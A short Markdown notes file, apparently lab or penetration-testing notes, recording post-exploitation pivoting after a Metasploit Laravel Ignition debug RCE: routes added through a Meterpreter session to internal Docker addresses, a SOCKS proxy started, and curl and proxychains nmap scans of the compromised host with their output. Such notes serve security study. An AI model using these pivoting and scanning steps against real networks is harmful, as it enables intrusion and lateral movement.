66 lines
1.8 KiB
Markdown
66 lines
1.8 KiB
Markdown
## Command
|
||
Routing the Service
|
||
```
|
||
# The discovered webserice_database IP will be routed to through the Meterpreter session
|
||
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.28.101.51/32 -1
|
||
[*] Route added
|
||
```
|
||
|
||
- website_databse ---> This is from the .env variable in the docker file ()
|
||
|
||
|
||
Routing Machine
|
||
```
|
||
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.17.0.1/32 -1
|
||
[*] Route added
|
||
```
|
||
|
||
|
||
Check the routing settings
|
||
```
|
||
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route print
|
||
|
||
IPv4 Active Routing Table
|
||
=========================
|
||
|
||
Subnet Netmask Gateway
|
||
------ ------- -------
|
||
172.17.0.1 255.255.255.255 Session 3
|
||
172.28.101.51 255.255.255.255 Session 3
|
||
|
||
|
||
[*] There are currently no IPv6 routes defined.
|
||
```
|
||
|
||
|
||
Setup Sock Proxy
|
||
```
|
||
msf6 > use auxiliary/server/socks_proxy
|
||
msf6 auxiliary(server/socks_proxy) > run
|
||
[*] Auxiliary module running as background job 1.
|
||
|
||
[*] Starting the SOCKS proxy server
|
||
```
|
||
|
||
|
||
Using the target machine
|
||
```
|
||
# From the attacker’s host machine, we can use curl with the internal Docker IP to show that the web application is running, and the socks proxy works
|
||
$ curl --proxy socks4a://localhost:9050 http://172.17.0.1 -v
|
||
|
||
… etc …
|
||
|
||
# From the attacker’s host machine, we can use ProxyChains to scan the compromised host machine for common ports
|
||
$ proxychains -q nmap -n -sT -Pn -p 22,80,443,5432 172.17.0.1
|
||
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 08:48 EDT
|
||
Nmap scan report for 172.17.0.1
|
||
Host is up (0.069s latency).
|
||
|
||
PORT STATE SERVICE
|
||
22/tcp open ssh
|
||
80/tcp open http
|
||
443/tcp closed https
|
||
5432/tcp closed postgresql
|
||
|
||
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
|
||
``` |